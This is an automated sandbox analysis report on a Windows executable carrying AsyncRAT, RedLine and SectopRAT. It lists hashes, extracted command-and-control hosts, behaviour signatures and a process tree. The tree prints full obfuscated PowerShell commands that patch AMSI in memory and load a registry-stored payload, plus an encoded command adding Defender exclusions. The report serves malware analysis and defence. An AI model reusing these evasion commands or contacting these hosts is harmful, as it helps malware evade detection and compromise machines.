Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/08/2024, 15:19

General

  • Target

    1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe

  • Size

    322KB

  • MD5

    59d3bc9ca446bf4fcce3a93cdbce134a

  • SHA1

    37120e1b71956b5f3852605db0f33f4565a3952d

  • SHA256

    1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db

  • SHA512

    d23ddc6d55d8bf237e68d946f1a330a14907ea2b891ccea0890f63ee0f47f746b6e1d9d2151da1744b36d14b06b428fe308ffd97ae44732f3491682610950b63

  • SSDEEP

    6144:3RptkRZIFoIkY/7J81GyQUMTa5+suXqWxHNDf1CPyysAosQSPJHdlLTpn:jHoIfjJ80Rl86xHTCPvsASQJHd

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

C2

blue.o7lab.me:7777

server.underground-cheat.xyz:7777

Mutex

RPYntXGt1eJi

Attributes
  • delay

    3

  • install

    true

  • install_file

    WinUpdate.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

redline

Botnet

server.underground-cheat.xyz

C2

server.underground-cheat.xyz:1337

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Async RAT payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 6 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 12 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:640
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:484
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{64217033-ae07-42a7-8a2b-48aee1d88a5d}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1436
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{08f909cf-5a59-4dfc-b93f-5ae46990d703}
        2⤵
          PID:5384
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:692
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:980
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:464
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:864
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:1032
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1048
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1164
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2828
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:jRzTslSfvWwn{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$YILyuZkdWxxvLt,[Parameter(Position=1)][Type]$SsExuaRXBi)$wrLgMBOnGum=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+'l'+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+'lega'+'t'+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','Cla'+'s'+''+[Char](115)+','+'P'+'u'+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+'iC'+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+'t'+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$wrLgMBOnGum.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+','+'H'+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+'lic',[Reflection.CallingConventions]::Standard,$YILyuZkdWxxvLt).SetImplementationFlags(''+'R'+''+'u'+'ntime'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+[Char](101)+''+[Char](100)+'');$wrLgMBOnGum.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+'k'+[Char](101)+'',''+'P'+'u'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+'i'+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+'S'+''+'i'+''+[Char](103)+''+[Char](44)+'New'+[Char](83)+'lo'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$SsExuaRXBi,$YILyuZkdWxxvLt).SetImplementationFlags(''+'R'+''+'u'+'n'+'t'+''+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+'a'+'g'+''+[Char](101)+''+'d'+'');Write-Output $wrLgMBOnGum.CreateType();}$awTmUFcgSEHAo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+'o'+'f'+''+[Char](116)+''+[Char](46)+''+'W'+'i'+[Char](110)+''+[Char](51)+'2.U'+'n'+''+[Char](115)+''+[Char](97)+''+'f'+''+'e'+'Na'+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+'t'+''+'h'+''+'o'+'ds');$KCnKOBCiPWJxJY=$awTmUFcgSEHAo.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+'b'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$leCEZZnnTfVIeDzJwSy=jRzTslSfvWwn @([String])([IntPtr]);$yHIomOYNxJtwBeGvFuwWjX=jRzTslSfvWwn @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UEMEzqyogJK=$awTmUFcgSEHAo.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+'l'+''+[Char](101)+'H'+[Char](97)+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+'.'+[Char](100)+''+'l'+''+[Char](108)+'')));$GWoSAVIaofRnjw=$KCnKOBCiPWJxJY.Invoke($Null,@([Object]$UEMEzqyogJK,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+'Li'+'b'+'ra'+[Char](114)+''+[Char](121)+'A')));$EGBsgndmuFWvWcHDT=$KCnKOBCiPWJxJY.Invoke($Null,@([Object]$UEMEzqyogJK,[Object](''+'V'+'ir'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+'c'+''+[Char](116)+'')));$ZrLiNAG=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GWoSAVIaofRnjw,$leCEZZnnTfVIeDzJwSy).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+'.'+[Char](100)+''+[Char](108)+''+'l'+'');$eldrdcubFiUgtafnP=$KCnKOBCiPWJxJY.Invoke($Null,@([Object]$ZrLiNAG,[Object](''+'A'+'ms'+[Char](105)+'Sc'+[Char](97)+'nB'+[Char](117)+'f'+[Char](102)+''+[Char](101)+''+'r'+'')));$jfxbQHYzdA=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EGBsgndmuFWvWcHDT,$yHIomOYNxJtwBeGvFuwWjX).Invoke($eldrdcubFiUgtafnP,[uint32]8,4,[ref]$jfxbQHYzdA);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$eldrdcubFiUgtafnP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EGBsgndmuFWvWcHDT,$yHIomOYNxJtwBeGvFuwWjX).Invoke($eldrdcubFiUgtafnP,[uint32]8,0x20,[ref]$jfxbQHYzdA);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+'T'+'W'+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](36)+''+'7'+'7st'+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:704
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBhAGkAdABIAGEAbgBkAGwAZQBcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBhAGkAdABIAGEAbgBkAGwAZQBcAFQAeQBwAGUASQBkAC4AZQB4AGUA
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:3728
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:1644
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:qfmMAHUhcmfs{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IntqZNdrutCqLd,[Parameter(Position=1)][Type]$IatDQClxdf)$RVkeDetdQky=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'edD'+'e'+''+[Char](108)+''+'e'+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+'e'+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType('M'+'y'+''+'D'+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+',Pub'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+'a'+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+'s'+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RVkeDetdQky.DefineConstructor(''+'R'+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+'B'+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$IntqZNdrutCqLd).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+'M'+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$RVkeDetdQky.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+'i'+[Char](103)+''+','+'N'+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+'i'+''+[Char](114)+''+[Char](116)+''+'u'+'a'+'l'+'',$IatDQClxdf,$IntqZNdrutCqLd).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $RVkeDetdQky.CreateType();}$pZArRefBeJFuT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+'m.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+'o'+'f'+'t'+'.'+''+[Char](87)+'i'+[Char](110)+'32'+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+'i'+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+'o'+'d'+'s'+'');$iRQOZsFxlNHkrl=$pZArRefBeJFuT.GetMethod(''+[Char](71)+''+[Char](101)+'tP'+[Char](114)+''+[Char](111)+'cA'+'d'+'d'+'r'+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+[Char](83)+''+[Char](116)+''+'a'+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EVuQxUBMFHBFzTzSJnM=qfmMAHUhcmfs @([String])([IntPtr]);$NyzWXqDqoHjnPVFFQLfYWl=qfmMAHUhcmfs @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hWgTekyyOaB=$pZArRefBeJFuT.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'M'+'o'+[Char](100)+''+[Char](117)+'le'+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$xxRIqFTnsYmoCk=$iRQOZsFxlNHkrl.Invoke($Null,@([Object]$hWgTekyyOaB,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+[Char](76)+''+'i'+''+'b'+'r'+[Char](97)+''+[Char](114)+'yA')));$wDcYcvvmpKyusMCxW=$iRQOZsFxlNHkrl.Invoke($Null,@([Object]$hWgTekyyOaB,[Object]('Vi'+[Char](114)+'t'+'u'+''+'a'+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+'ec'+[Char](116)+'')));$BtqReAi=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xxRIqFTnsYmoCk,$EVuQxUBMFHBFzTzSJnM).Invoke('am'+[Char](115)+'i'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$croxzArPJrMPzJXeQ=$iRQOZsFxlNHkrl.Invoke($Null,@([Object]$BtqReAi,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+''+'S'+''+'c'+''+'a'+''+'n'+''+'B'+'uf'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$DDMlGEUrUP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wDcYcvvmpKyusMCxW,$NyzWXqDqoHjnPVFFQLfYWl).Invoke($croxzArPJrMPzJXeQ,[uint32]8,4,[ref]$DDMlGEUrUP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$croxzArPJrMPzJXeQ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wDcYcvvmpKyusMCxW,$NyzWXqDqoHjnPVFFQLfYWl).Invoke($croxzArPJrMPzJXeQ,[uint32]8,0x20,[ref]$DDMlGEUrUP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+'T'+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          PID:648
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:3212
                          • C:\Users\Admin\AppData\Roaming\WaitHandle\TypeId.exe
                            C:\Users\Admin\AppData\Roaming\WaitHandle\TypeId.exe
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:5616
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                              3⤵
                                PID:2856
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            1⤵
                            • Indicator Removal: Clear Windows Event Logs
                            PID:1216
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1240
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                              1⤵
                                PID:1356
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1404
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1412
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1428
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2576
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                        1⤵
                                          PID:1468
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          1⤵
                                            PID:1492
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1584
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1680
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                1⤵
                                                  PID:1696
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1792
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                    1⤵
                                                      PID:1836
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                      1⤵
                                                        PID:1856
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1868
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                          1⤵
                                                            PID:1940
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                            1⤵
                                                              PID:1988
                                                            • C:\Windows\System32\spoolsv.exe
                                                              C:\Windows\System32\spoolsv.exe
                                                              1⤵
                                                                PID:1708
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                1⤵
                                                                  PID:2088
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2208
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2344
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2432
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                      1⤵
                                                                        PID:2440
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2548
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                          1⤵
                                                                          • Drops file in System32 directory
                                                                          • Modifies data under HKEY_USERS
                                                                          PID:2596
                                                                        • C:\Windows\sysmon.exe
                                                                          C:\Windows\sysmon.exe
                                                                          1⤵
                                                                            PID:2708
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                            1⤵
                                                                              PID:2724
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                              1⤵
                                                                                PID:2740
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                1⤵
                                                                                  PID:2768
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  1⤵
                                                                                    PID:3048
                                                                                  • C:\Windows\system32\wbem\unsecapp.exe
                                                                                    C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                    1⤵
                                                                                      PID:2924
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                      1⤵
                                                                                        PID:3412
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of UnmapMainImage
                                                                                        PID:3460
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe"
                                                                                          2⤵
                                                                                          • Checks computer location settings
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3688
                                                                                          • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:536
                                                                                          • C:\Users\Admin\AppData\Local\Temp\$77svchost.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\$77svchost.exe"
                                                                                            3⤵
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2128
                                                                                            • C:\Windows\SysWOW64\cmd.exe
